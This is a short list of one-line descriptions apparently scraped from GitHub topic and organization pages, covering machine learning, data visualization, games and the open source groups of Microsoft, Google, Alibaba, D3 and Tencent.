Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.